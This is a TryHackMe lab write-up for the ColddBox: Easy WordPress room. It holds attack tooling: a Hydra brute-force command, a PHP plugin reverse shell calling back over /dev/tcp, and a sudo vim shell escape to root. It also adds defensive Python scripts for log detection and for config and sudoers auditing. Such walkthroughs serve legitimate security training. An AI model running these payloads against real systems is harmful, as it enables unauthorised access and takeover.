TryHackMe Write-up - ColddBox: Easy

It’s been a while since I last posted. I’ve been toiling away at TryHackMe, a site I signed up for in December to whet my cybersecurity appetite. I forked out quite a bit of money to access the Offensive Security modules at the beginning of the year, but I find that TryHackMe is a lot more ‘fun’ in the sense that it is highly community driven with walkthroughs for nearly all of the rooms that I have interacted with, unlike Offensive Security. Don’t get me wrong, I like what I have seen on the Offensive Security portal and will make my way back to it eventually, for now, I am simply running through the ‘gamified’ TryHackMe to level up, get some badges, and learn some stuff.

Of course, Offensive Security would say that they too are community driven, but they are also really big on not letting their educational material leave their site. TryHackMe, on the other hand, is much more lax, and much cheaper.

Anyway, with all that said, one of the reasons I set up a blog is to have a place for write-ups as I work on building my penetration testing knowledge. I have been doing a lot of machines but have yet to jump into the domain of writing a write-up; that stops today with this inaugural write-up of TryHackMe’s ColddBox: Easy room. Let’s jump in.

Getting Started

As the name states, this is an easy difficulty room, and, as is typical in these rooms, one must find the user flag and the root flag. As this is my first write-up, and because several other write-ups have already been written, I’ll lean heavily on the experiences of those who wrote before me.

After launching the machine, we get the following IP address: 10.10.192.58

First things first, let’s run an nmap scan:

nmap -sC -sV 10.10.192.58

Command Breakdown:

  • nmap - invoke nmap
  • -sC - equivalent to --script=default
  • -sV - Probe open ports to determine service/version info
  • <IP Address> - the IP address of the machine

nmap -sC -sV 10.10.192.58

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-04 19:30 GMT
Nmap scan report for ip-10-10-192-58.eu-west-1.compute.internal (10.10.192.58)
Host is up (0.0010s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
MAC Address: 02:5F:CF:55:9B:EB (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.85 seconds

This only runs against the top 1000 ports, and we can see that only port 80 is open. We also can see that this is a WordPress site running on an Apache server.

I checked out Exploit-DB to see if there are any exploits for the two versions listed in the scan, but didn’t find anything:

[image: exploit-db apache results]

[image: exploit-db wordpress results]

Alright, no worries, let’s use Gobuster to fuzz through all of the possible directories that might exist:

gobuster dir -u 10.10.192.58 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.192.58
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/03/04 19:34:43 Starting gobuster
===============================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-admin (Status: 301)
/hidden (Status: 301)
/server-status (Status: 403)
===============================================================
2023/03/04 19:35:11 Finished
===============================================================

There isn’t much here. The /wp-admin path redirects to /wp-login, but that /hidden path looks interesting; let’s check it out:

[image: note from hidden path endpoint]

This looks to be a note from a ‘Philip’ talking about two other users, ‘C0ldd’ and ‘Hugo’, but I am not sure whether these are real names or nicknames rather than login usernames. It would be nice to get the usernames to log in with so we could brute-force some passwords.

Some of the write-ups I looked at used a tool called wpscan. It sounds like a good tool to use given that this is a WordPress site, and since this version of WordPress didn’t show any exploits. I’ve never used wpscan up until now, but now is as good a time as any.

Before running it, I added the VM’s IP address to my /etc/hosts file like so (though it’s not mandatory):

10.10.192.58 ColddBoxEasy

After performing the scan, we’re returned with these results:

wpscan --url http://ColddBoxEasy -e vp,vt,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://colddboxeasy/ [10.10.192.58]
[+] Started: Sat Mar  4 19:54:25 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://colddboxeasy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://colddboxeasy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://colddboxeasy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://colddboxeasy/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://colddboxeasy/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://colddboxeasy/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://colddboxeasy/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.3
 | Style URL: http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://colddboxeasy/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:06 <> (494 / 494) 100.00% Time: 00:00:06
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:12 <==> (10 / 10) 100.00% Time: 00:00:12

[i] User(s) Identified:

[+] [REDACTED]
 | Found By: Rss Generator (Passive Detection)

[+] [REDACTED]
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] [REDACTED]
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] [REDACTED]
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Sat Mar  4 19:55:08 2023
[+] Requests Done: 551
[+] Cached Requests: 10
[+] Data Sent: 128.562 KB
[+] Data Received: 332.173 KB
[+] Memory used: 303.82 MB
[+] Elapsed time: 00:00:43

Great! Four users turned up; three of them seem to be related to that hidden note. I have redacted the names from the printout.

Now let’s try running hydra against these usernames to see if we can recover some passwords. I initially started off with a .txt file listing the four users, but that was taking quite a bit of time, so I ran four hydra instances in parallel, one per user, and wound up with a password for one of them. Though I won’t paste the password here, I will share the command I ran:

hydra -l [REDACTED] -P /usr/share/wordlists/rockyou.txt ColddBoxEasy -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Admittedly, I got this command from another write-up as I am still getting acquainted with Hydra.
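Seen from the other side of the wire, the three steps above (Gobuster’s directory fuzzing, wpscan’s author-ID enumeration and the Hydra run against wp-login.php) each leave a distinctive pattern in the web server’s access log. The following Python script is an added example of mine, not code from this write-up or from any of the tools it mentions: it parses Apache combined-format log lines and flags the three patterns per client IP. The log lines, the thresholds and the scanner user-agent substrings are constructed for the example and would need tuning against a real site’s traffic.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format, one request per line, e.g.
# 10.0.0.5 - - [04/Mar/2023:19:34:43 +0000] "GET /hidden HTTP/1.1" 301 512 "-" "gobuster/3.0.1"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")
# Constructed starting list of user-agent fragments. Tools can change their UA, so this is a
# weak signal on its own; the count-based rules below are the ones to rely on.
SCANNER_UA_MARKERS = ("gobuster", "wpscan", "hydra")


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(lines, window=timedelta(seconds=60), not_found_threshold=20,
           login_threshold=10, author_threshold=3):
    """Group requests by client IP and apply three WordPress-specific rules."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = []
    for ip, recs in per_ip.items():
        # Directory fuzzing: a wordlist run produces a burst of 404s for paths that never existed.
        misses = [r["ts"] for r in recs if r["status"] == 404]
        # Credential guessing: repeated POSTs to the login form from one client.
        logins = [r["ts"] for r in recs
                  if r["method"] == "POST" and r["path"].startswith("/wp-login.php")]
        # Author-ID enumeration: /?author=1, /?author=2, ... (WordPress redirects each to /author/<name>/).
        authors = set()
        for r in recs:
            m = AUTHOR_RE.search(r["path"])
            if m:
                authors.add(m.group(1))
        agents = {r["ua"] for r in recs
                  if any(k in r["ua"].lower() for k in SCANNER_UA_MARKERS)}

        n = max_in_window(misses, window)
        if n >= not_found_threshold:
            findings.append({"ip": ip, "rule": "dir_bruteforce", "count": n})
        n = max_in_window(logins, window)
        if n >= login_threshold:
            findings.append({"ip": ip, "rule": "login_bruteforce", "count": n})
        if len(authors) >= author_threshold:
            findings.append({"ip": ip, "rule": "author_enum", "count": len(authors)})
        if agents:
            findings.append({"ip": ip, "rule": "scanner_user_agent", "count": len(agents)})
    return findings


def build_sample_log():
    """Constructed sample traffic (not a real capture): one noisy client and one ordinary visitor."""
    base = datetime(2023, 3, 4, 19, 34, 43, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status, ua):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'

    lines = [line("10.0.0.5", i, "GET", f"/guess{i}", 404, "gobuster/3.0.1") for i in range(25)]
    lines.append(line("10.0.0.5", 26, "GET", "/hidden", 301, "gobuster/3.0.1"))
    lines += [line("10.0.0.5", 40 + n, "GET", f"/?author={n}", 301, "WPScan v3.8.7") for n in range(1, 5)]
    lines += [line("10.0.0.5", 60 + i, "POST", "/wp-login.php", 200, "Mozilla/5.0 (Hydra)") for i in range(12)]
    lines.append(line("10.0.0.9", 5, "GET", "/", 200, "Mozilla/5.0"))
    lines.append(line("10.0.0.9", 7, "GET", "/wp-content/themes/twentyfifteen/style.css", 200, "Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for f in detect(build_sample_log()):
        print(f"{f['ip']}: {f['rule']} (count={f['count']})")
```

Run against the constructed sample, the noisy client trips all three count rules while the ordinary visitor produces nothing. The windowed counts matter more than the user-agent match: a gobuster run against a 220,000-entry wordlist, as in the write-up, is thousands of 404s from one address within a minute, which no amount of user-agent spoofing hides.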

Logging into WordPress

After logging into the WordPress Admin portal, the first thing I want to do is check whether the user has Administrator rights. I can do this from the Users page while logged in, and I see that the user I am logged in as is in fact an Administrator:

[image: logged in as administrator]

Pop a shell

Now to get a reverse shell. From some of the other write-ups I saw, there are multiple ways to pop a shell. I am going to go with uploading a plug-in containing a reverse shell, but before I do that, I need to start a listener on my attacking machine:

nc -lvnp 1234

Below is the reverse shell script that we’ll upload:

<?php

/**
 *  Plugin Name: Wordpress Maint Shell
 *  Author: Wordpress
 **/
// Runs when WordPress loads the plugin: connects back to the listener on 10.10.108.11:1234
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.108.11/1234 0>&1'");
?>

The plug-ins page only allows for .zip uploads, so let’s zip up the file and upload it.

[image: activate plugin]

After waiting a while, an error is encountered, and the plug-in is not activated:

[image: activate plugin]

Alright, let’s try this a different way. In another write-up, a PHP reverse shell script is uploaded as the theme’s 404 template. We’ll grab that world famous PHP script, copy it, and paste it into the 404 template. Then, with the listener running, we trigger it by navigating to a 404 page, which is easy: just request any URL that would return a 404. Having done that, we can switch back to the listener to see our shell:

root@ip-10-10-108-11:~# nc -lvnp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.192.58 45108 received!
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:13:59 up  1:45,  0 users,  load average: 44.77, 44.76, 44.59
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Let’s stabilize it with the following two commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Great! Let’s grab some flags now!

Getting flags

After running whoami we can see that I am logged in as the www-data user, let’s see if that’s enough to get the user.txt flag:

www-data@ColddBox-Easy:/home/[REDACTED]$ ls
ls
user.txt
www-data@ColddBox-Easy:/home/[REDACTED]$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

Nope, the www-data user is unable to read this user’s home directory files, so we’ll need to elevate our privileges somehow. Or, why not try switching to the user with the same password they used to log in to the WordPress portal?

Switching to the user with the WordPress Admin password doesn’t work. In another write-up I saw that we could take a look at the MySQL database to glean more user information.

Navigating back to /var/www/html, we can see that there is a wp-config.php file. Let’s cat that and see if we can get a password:

/** MySQL database username */
define('DB_USER', '[REDACTED]');

/** MySQL database password */
define('DB_PASSWORD', '[REDACTED]');

Aha! Ok, let’s try switching to the user again, but with this password instead. It worked!

www-data@ColddBox-Easy:/var/www/html$ su [REDACTED]
Password: [REDACTED]

[REDACTED]@ColddBox-Easy:/var/www/html$ whoami
[REDACTED]
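Two things made the foothold and this pivot possible: wp-admin was allowed to edit theme templates and upload plugins, and the database password in wp-config.php doubled as a user’s Linux password. The first can be switched off in wp-config.php itself with WordPress’s DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS constants; the second is a policy matter, since the web server account has to be able to read the file. The Python audit below is an added example of mine, not code from this write-up or from WordPress: it parses the define() lines of a wp-config.php body and checks the file’s permission bits. The two config bodies and the credential values in them are constructed placeholders.

```python
import re
import stat

# Matches one PHP define('NAME', value); line as used throughout wp-config.php
DEFINE_RE = re.compile(r"""define\(\s*['"](?P<name>[A-Z_]+)['"]\s*,\s*(?P<value>[^)]+?)\s*\)\s*;""")


def parse_defines(config_text):
    """Return {NAME: value} with PHP true/false mapped to Python booleans and strings unquoted."""
    defines = {}
    for m in DEFINE_RE.finditer(config_text):
        raw = m.group("value").strip()
        if raw.lower() in ("true", "false"):
            defines[m.group("name")] = raw.lower() == "true"
        else:
            defines[m.group("name")] = raw.strip("'\"")
    return defines


def audit_wp_config(config_text, mode):
    """Return a list of findings for a wp-config.php body and its permission bits.

    Checks the two WordPress constants that remove the wp-admin file-editing paths used in the
    write-up, plus the file mode: anything readable by other local users leaks DB_PASSWORD.
    """
    defines = parse_defines(config_text)
    findings = []
    if defines.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT not set: the theme/plugin editor in wp-admin can rewrite 404.php")
    if defines.get("DISALLOW_FILE_MODS") is not True:
        findings.append("DISALLOW_FILE_MODS not set: plugin/theme zip uploads from wp-admin are allowed")
    if mode & stat.S_IROTH:
        findings.append("wp-config.php is world-readable: every local account can read DB_USER/DB_PASSWORD")
    if not defines.get("DB_PASSWORD"):
        findings.append("DB_PASSWORD is empty")
    return findings


# Constructed sample bodies; the credential values are placeholders, not the room's.
WEAK_CONFIG = """<?php
/** MySQL database username */
define('DB_USER', 'wp_user');            // placeholder
/** MySQL database password */
define('DB_PASSWORD', 'placeholder-pw'); // placeholder
define('DB_HOST', 'localhost');
"""

HARDENED_CONFIG = WEAK_CONFIG + """
/** Removes Appearance > Editor and Plugins > Editor: no template edits via wp-admin */
define('DISALLOW_FILE_EDIT', true);
/** Also blocks plugin/theme install, upload and update from wp-admin; deploy them from disk instead */
define('DISALLOW_FILE_MODS', true);
"""


if __name__ == "__main__":
    # Typical modes: 0644 as often installed, vs. 0640 owned by root with the web server's group
    for label, text, mode in (("weak", WEAK_CONFIG, 0o644), ("hardened", HARDENED_CONFIG, 0o640)):
        print(label, audit_wp_config(text, mode) or "no findings")
```

Note what the audit cannot see: the reuse of DB_PASSWORD as a shell account password. The file has to hold a plaintext database credential, so the only defence against the su step in this write-up is a separate, unrelated password (or no password login at all) for the local user.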

Alright, let’s get the user.txt file then:

[REDACTED]@ColddBox-Easy:~$ cat user.txt
[REDACTED]

We got it! Great, let’s try running sudo -l to see if this user has any sudo privileges.

El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Awesome! They do! Let’s use GTFOBins to elevate our privileges using one of these programs. I’ll choose vim. Looking up vim on GTFOBins to see what to run to gain a root shell, I chose this:

sudo vim -c ':!/bin/sh'

And bam! Root shell acquired!

[REDACTED]@ColddBox-Easy:~$ sudo vim -c ':!/bin/bash'
sudo vim -c ':!/bin/bash'

root@ColddBox-Easy:~# whoami
2R11;rgb:4040/4545/5252whoami
2R11: no se encontró la orden
bash: rgb:4040/4545/5252whoami: No existe el archivo o el directorio
root@ColddBox-Easy:~# 
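The root shell comes from a sudoers rule that lets the user run vim as root; vim, like the chmod and ftp entries next to it, can be turned into a root shell or a permission change, which is the whole lesson of the sudo -l step. An administrator can catch rules like that before anyone else does. The script below is an added example of mine, not code from this write-up or from sudo: it parses the permitted-command lines of sudo -l output (the `(runas) command` lines, which look the same whatever language the surrounding messages are in) and flags commands from a watch list. The watch list holds only the three programs from the write-up and should be extended, for instance from GTFOBins, for a real audit; the second sample output is constructed.

```python
import os
import re

# One permitted-command line of `sudo -l` output, e.g.
#     (root) /usr/bin/vim
#     (root) NOPASSWD: /bin/chmod
#     (ALL : ALL) ALL
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

# Watch list: programs from the write-up that give a shell or change any file's permissions when
# run via sudo. This is a constructed minimum; extend it (e.g. from GTFOBins) for a real audit.
WATCH_LIST = {
    "vim": "editor with a shell escape (see the write-up), gives an interactive shell",
    "chmod": "can change the permissions of any file",
    "ftp": "interactive client listed on GTFOBins",
}


def parse_sudo_l(output):
    """Extract (runas, tags, command) entries from `sudo -l` output; header lines are ignored."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t for t in m.group("tags").replace(" ", "").split(":") if t]
        entries.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": m.group("cmd")})
    return entries


def assess(entries):
    """Return (command, reason) pairs for entries an administrator should revisit."""
    findings = []
    for e in entries:
        cmd = e["cmd"]
        if cmd == "ALL":
            findings.append((cmd, f"unrestricted sudo as {e['runas']}"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in WATCH_LIST:
            findings.append((cmd, f"{WATCH_LIST[binary]} as {e['runas']}"))
        elif "NOPASSWD" in e["tags"]:
            findings.append((cmd, "runs without a password; confirm the command cannot be abused"))
    return findings


# The sudo -l output shown in the write-up (Spanish locale), verbatim
COLDDBOX_SUDO_L = """El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
"""

# Constructed example of a narrower rule: a wrapper script that does one job, not an editor or shell
RESTRICTED_SUDO_L = """User webadmin may run the following commands on web01:
    (root) NOPASSWD: /usr/local/sbin/restart-web.sh
"""


if __name__ == "__main__":
    for label, out in (("colddbox", COLDDBOX_SUDO_L), ("restricted", RESTRICTED_SUDO_L)):
        for cmd, reason in assess(parse_sudo_l(out)) or [("-", "no findings")]:
            print(f"{label}: {cmd}: {reason}")
```

All three ColddBox entries are flagged; the constructed wrapper-script rule only gets the informational NOPASSWD note, which is the shape a least-privilege sudo rule should take: a fixed script with no arguments, rather than a general-purpose editor, permission tool or interactive client.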

Ok, let’s grab the root flag and we’ll be done. Let’s navigate to the root directory, and…

Boom, there we go! Nice job…

root@ColddBox-Easy:/root# cat root.txt
[REDACTED]

Conclusion

This was a great diversion from some of the learning I have been doing. I know that in order to get good in the cybersecurity field, a lot of practical exercise is required; theory just doesn’t do the actual exercises justice.

I have used and learned about a lot of different tools as I work through the various modules and learning paths on TryHackMe, and this was the first time I used wpscan. It’s possible that this tool isn’t required to get the user names, but it seems to be packaged with Kali natively, so it’s definitely a good tool to use when dealing with WordPress sites.